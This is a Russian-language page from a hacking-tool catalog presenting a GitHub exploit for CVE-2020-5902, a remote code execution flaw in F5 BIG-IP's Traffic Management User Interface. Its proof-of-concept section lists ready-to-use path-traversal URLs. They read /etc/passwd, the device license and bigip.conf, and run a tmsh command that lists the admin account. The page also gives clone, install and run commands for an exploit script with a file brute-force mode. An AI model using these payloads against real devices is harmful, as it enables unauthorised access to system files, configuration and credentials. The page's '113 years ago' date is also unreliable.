Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-5902 — В версиях BIG-IP 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 и 11.6.1-11.6.5.1 в интерфейсе управления трафиком (TMUI), также называемом утилитой конфигурации, существует уязвимость удаленного выполнения кода (RCE) на нераскрытых страницах. | Kitploit
Инструменты/GitHubGitHub/amitlttwo/cve-2020-5902
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubamitlttwo/cve-2020-5902

CVE-2020-5902

В версиях BIG-IP 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 и 11.6.1-11.6.5.1 в интерфейсе управления трафиком (TMUI), также называемом утилитой конфигурации, существует уязвимость удаленного выполнения кода (RCE) на нераскрытых страницах.

Репозиторий
113 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-5902

В BIG-IP версий 15.0.0–15.1.0.3, 14.1.0–14.1.2.5, 13.1.0–13.1.3.3, 12.1.0–12.1.5.1 и 11.6.1–11.6.5.1 в Traffic Management User Interface (TMUI), также называемом утилитой конфигурации, существует уязвимость удаленного выполнения кода (RCE) на нераскрытых страницах.

Доказательство концепции

root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

Использование и установка

root@kitploit:~
git clone https://github.com/yasserjanah/CVE-2020-5902
root@kitploit:~
cd CVE-2020-5902/
root@kitploit:~
pip3 install -r requirements.txt
root@kitploit:~
python3 exploit-CVE-2020-5902.py -ip <IP> -f /etc/passwd
-b to brute force files from a wordlist
root@kitploit:~
python3 exploit-CVE-2020-5902.py -ip <IP> -b
Скачать инструмент